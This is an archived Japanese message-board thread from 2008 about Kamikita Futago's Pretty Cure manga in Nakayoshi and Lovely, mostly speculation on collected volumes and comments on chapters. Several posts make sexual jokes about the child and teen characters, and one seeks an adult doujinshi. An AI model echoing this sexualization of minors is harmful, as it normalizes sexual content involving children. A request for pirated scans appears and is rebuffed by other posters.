プリキュア5の無印 は、月刊と合わせて16本になるんのかな

486 :花と名無しさん:2008/04/11(金) 13:42:06 ID:???0
ん、ラブリーって年何回出てるんだ?
4回じゃないの?

487 :花と名無しさん:2008/04/11(金) 18:51:11 ID:???O
>>486
去年から初夏ラブリーが出来た

488 :花と名無しさん:2008/04/12(土) 15:25:32 ID:WDPy9J0FO
SSの2巻が発売しないのがショックだな
プリキュア5の無印は発売しそうだが。

489 :花と名無しさん:2008/04/13(日) 10:40:56 ID:I/bLrimk0
>>481-4825のがエロエロだったら確実?に児童ポルノ規制に引っかかる。


>>488たぶんお蔵になったんだと思う…

490 :花と名無しさん:2008/04/13(日) 13:22:42 ID:???0
>489

ふたご版から醸しだされるエロスの記号はスゴイ。
公式コミックでありながら、すべてのエロ同人誌は道を譲れ、のクオリティだ。

491 :花と名無しさん:2008/04/16(水) 22:11:22 ID:NW5MOWQGO
つうか5の無印って本当に発売すんのか?
SSみたいにお蔵いりになりそうな気もする

492 :花と名無しさん:2008/04/20(日) 19:07:43 ID:???0
・現時点でアナウンスが全く無い
・映画コミックスも出てない(フィルコミ除く)
可能性は0じゃないけどまぁまず出ないだろうね


493 :花と名無しさん:2008/04/21(月) 07:48:31 ID:???0
なんで出さないんだ?

出さない理由がまったくわからん?
講談社はナニ考えてるんだろう…?

494 :花と名無しさん:2008/04/21(月) 10:49:11 ID:???0
講談社が売れないと判断したからだろう。
VFB含め、これまで発行した単行本・ムックの売れ行きは
はかばかしくなかったようだ。
そもそもプリキュアは、たの幼・おともだちが主力だし。


495 :花と名無しさん:2008/04/21(月) 13:07:22 ID:???0
どれみも最終巻は出てないしw

アニメのコミカライズである以上、放送中と違うタイトルの本を
出すのは難しいよ。

496 :花と名無しさん:2008/04/22(火) 13:50:36 ID:???0
完全に狙って上北ふたごプリキュアコレクションと銘打って出しちゃうのもアリかなあとは思うんだ。

497 :花と名無しさん:2008/04/29(火) 08:02:34 ID:???0
なかよしGWだからもう発売されているのか!買いに行かねば!
ところで古い話なんだけど過去スレ読んで気になったんだけど

279 名前:花と名無しさん :04/03/16 09:50 ID:???
上北ふたごって言えばまだそんなに有名じゃない時に
うたたねひろゆきが上北ふたごのエロ同人誌を作ってコミケで売っていたな

…ってなんてタイトルかわかるエッチな人居たらエッチな俺に教えてください

498 :花と名無しさん:2008/04/29(火) 21:43:37 ID:???O
6月号はミルキィローズかくるみは出てるのかな?
神絵師なだけに新キャラをどう書いてくれるかわくわくする

499 :花と名無しさん:2008/04/29(火) 22:20:17 ID:???0
>>496
なかよしのコミックスサイズよりそういう感じのほうが良いな

500 :花と名無しさん:2008/04/30(水) 01:12:41 ID:???0
今日は最悪の1日だった。 SSのせいだ。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                           ∧_∧
◎               へ          (´<_` )  
  \    ≫ ̄ ̄ ̄ ̄彡ヽ ̄ ̄ ̄ ̄ ̄ ̄⌒    \  
      彡____人  )  ̄ ̄ ̄ ̄ ̄\       ) 
 ◎-●一( * *    ヽミ          |.      | 
      ((_ _ (( ( ;;-=- ̄=─ ̄ '⌒ヽ〉     | | 
 ‘,'.∴・,‘・(ε ((  ヽ-=_二__ ̄    \     | | 
  ,'.・∵  ヽ_____ ノ       ̄\     / / 
       (__))     ヽ        .\__/_丿  
       |  | 泣きの勝平 ヽ        .|  |
       |  |______)          |  |
       |  〉三三三[□]三)        |  |
       ノノノノ:::::::::::::::::::::::::::::/         \ ヽ
       ~~~|::::::::::::::::::/:::::::/             \ |
         |;;;;;;;;;;;;;;;/;;;;;;;/            / ノ
        (___|)_|)           `-

501 :花と名無しさん:2008/04/30(水) 17:32:28 ID:???O
くるみもミルキィもミルクも出てきたww
そういや漫画じゃ初見参だったっけ>ミルク

つーかふたご先生は、うららをあーいうキャラにするつもりなのかなw


502 :花と名無しさん:2008/05/18(日) 07:15:41 ID:???0
ラブリー発売してんのか!今日はプリキュア観て速攻で本屋行って買ってくる!

503 :花と名無しさん:2008/05/20(火) 12:16:13 ID:???0
ヘッポコな格好なのにキマって見えるという不思議。
素材がいいと何をやっても様になるということか

504 :花と名無しさん:2008/05/20(火) 21:31:06 ID:???0
いや、むしろ上北センセの画力さ!

505 :花と名無しさん:2008/05/23(金) 22:24:47 ID:+YCeTe+9O
1月号のココのぞのキスシーンがみれなかった自分は負け組
あのとき買っときゃよかったとかなり後悔してる

506 :花と名無しさん:2008/05/24(土) 00:38:44 ID:???0
キスしてないよ。

のぞみの中
あったかくて
気持ちいいココ…

ってスゲぇセリフが出てくるけどね。

507 :花と名無しさん:2008/05/31(土) 23:09:06 ID:???0
>>505
俺はあの号から買い始めたぜ

508 :花と名無しさん:2008/06/01(日) 15:42:34 ID:???0
コミック出るの待ってるけど、やっぱ出ないんだろうか

509 :花と名無しさん:2008/06/02(月) 23:51:30 ID:???O
SSの続きも読みたいぜよ、、

510 :花と名無しさん:2008/06/03(火) 01:39:39 ID:???0
今月2ページ目のナッツ面白すぎるだろw

511 :花と名無しさん:2008/06/03(火) 05:36:40 ID:???0
すりません。無理を承知でお願いしたいのですが、
どなたかプリキュアSSの漫画版を再うpして頂けないでしょうか。

512 :花と名無しさん:2008/06/03(火) 09:11:08 ID:???0
無理です

513 :花と名無しさん:2008/06/03(火) 10:58:33 ID:???0
>>511
「俺のために犯罪に手を染めろ」と丁寧に言われても困ります

514 :花と名無しさん:2008/06/05(木) 11:20:02 ID:???0
おもちゃの宣伝ページはナッツの異様に爽やかな笑顔とポーズに笑うw
キミもカラフルビーズクルーラー体験☆してみないか?

515 :花と名無しさん:2008/06/05(木) 20:30:34 ID:???0
>>511
国立国会図書館に依頼するんだ

516 :花と名無しさん:2008/06/06(金) 09:16:35 ID:???0
>>515
それは、本屋でなかよし買うより恥ずかしいなw

517 :花と名無しさん:2008/06/06(金) 12:09:11 ID:???0
今はネットでコピーサービス頼めるよ。

518 :花と名無しさん:2008/06/07(土) 14:27:07 ID:ygiZcCu3O
>>505
ココのぞがまじでキスしたなら写メでいいからみてえな。

519 :花と名無しさん:2008/06/23(月) 21:30:49 ID:UQHP3ygUO
ココとのぞはできてるの?

520 :花と名無しさん:2008/06/23(月) 21:55:41 ID:???0
時々皆が引くくらい2人の世界を作りますが、付き合ってはいません

521 :花と名無しさん:2008/07/02(水) 23:24:08 ID:???O
増刊ラブリーにもGOGO載ってるのか
誰か買った人いる?

522 :花と名無しさん:2008/07/03(木) 21:16:46 ID:???0
>増刊
のぞみの対宿題兵装は必見! かわいいのだよ、あれは

523 :花と名無しさん:2008/07/04(金) 00:22:23 ID:???0
ナツりんやめて本編通りナツこまでいくのかなあ
どっちも好きなんで両立するのがベストなんだけど

524 :花と名無しさん:2008/07/04(金) 10:26:07 ID:???0
今月号は水着あり、まさかのポロリあり!!!

525 :花と名無しさん:2008/07/04(金) 14:06:16 ID:???0
問題は、ポロリするほどあるかだ!

526 :花と名無しさん:2008/07/04(金) 20:40:44 ID:???0
スルリ

527 :花と名無しさん:2008/07/04(金) 23:57:08 ID:???0
のぞみ&りん>くるみ&シロー…チームワークの差が勝敗を分けたな
くるみはかれんをパートナーに選んだ方が良かったのかも知れないね
それにつけても3ページ5コマ目のシローの顔がなんか笑えるw

528 :花と名無しさん:2008/07/05(土) 11:40:44 ID:???0
シローきゅんの水着ハァハァ

529 :花と名無しさん:2008/07/21(月) 02:40:03 ID:???0
今月のラブリーには載ってた?
なんでホームページにラインナップをちゃんと書かないんだろうな。

530 :花と名無しさん:2008/07/21(月) 06:25:01 ID:???0
七夕のお話が載ってたよ

531 :花と名無しさん:2008/07/22(火) 02:35:36 ID:???0
ありがとう。買ってくる

532 :花と名無しさん:2008/07/24(木) 08:34:19 ID:???0
まどか×シローというマニアックな絡みが泣けるで

533 :花と名無しさん:2008/07/28(月) 02:13:20 ID:???0
無印単行本ゲット記念カキコ

534 :花と名無しさん:2008/07/28(月) 02:23:08 ID:???0
まどかさん出てくるのか
なかよしはサブキャラよく出てくるのか?

535 :花と名無しさん:2008/07/30(水) 19:18:25 ID:???0
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ

プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ

プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ
プリキュア5gogo!3.9%突破∩( ・ω・)∩バンジャーイ

536 :花と名無しさん:2008/08/02(土) 00:46:00 ID:???O
やはり単行本化は無理なのだろうか・・

537 :花と名無しさん:2008/08/03(日) 00:37:26 ID:???0
保守

538 :花と名無しさん:2008/08/11(月) 03:30:12 ID:???0
なかよし9月号の内容について某サイトで知ったんだけど
1ページ目の大ゴマモブシーン中になぎさとほのからしき後ろ姿が
小ゴマに咲舞満薫とみのりちゃんが描かれているようですんで探してみてくださいw

539 :花と名無しさん:2008/08/11(月) 19:10:38 ID:???0
上北ふたごアワーで飢えをしのぐか

540 :花と名無しさん:2008/08/20(水) 22:18:06 ID:???0
女子ソフト決勝進出オメ!!
ネバギブで12回裏サヨナラ!
                          / ̄厂` ー 、
                        _/           \
r―――--      __      _   |└-=ー '      _」
l              ) ̄ ¨厂ヽ、 〉┐論  __ _ ノ   \     rー、
`¨¨    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄[j r―、テ イ: : ハ Tつ Yナf!T广¨´      }ー 、h、
                 `7‐≠⌒ ノ: :ノ: 卜. _八  _〉      〔」ノ r‐、V
                 / /  /´ノイィ:ナーヘ: :|  ´ノ         〉― 、_/
                `ヽ-、 / __   jノ|   `¨゙`く_       ,し=、  〉
                 └⌒| /- 、ヽ.   l     //`7ァ、_ /   》'
                    l/  //     ヽ \  {__// /  `   l
                    )' // /   \      / /      /
                    /し'//   / _」> 、∠∠ -―――'
  ┏┓  ┏━━┓        />'    / //        ┏┓┏┓┏┓
┏┛┗┓┃┏┓┃        _[      -≠ / /        ┃┃┃┃┃┃
┗┓┏┛┃┗┛┃┏━━./ l|   / /   /━━━━━┓┃┃┃┃┃┃
┏┛┗┓┃┏┓┃┃  ,(_/ /く\∠      /.          ┃┃┃┃┃┃┃
┗┓┏┛┗┛┃┃┗━// /  YこZ7二广´\_━━━━┛┗┛┗┛┗┛
  ┃┃      ┃┃   /   /  〈__7  /‐'  /  \_      ┏┓┏┓┏┓
  ┗┛      ┗┛ / ` ナー    // -‐     / /`  、   ┗┛┗┛┗┛
           く \ /、    /」  _   / /       \

541 :花と名無しさん:2008/08/21(木) 17:06:08 ID:???O
5をコミックス化してほしい
なかよしは買っていたけどラブリー買ってなかったから未読分がすごく気になる

106 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)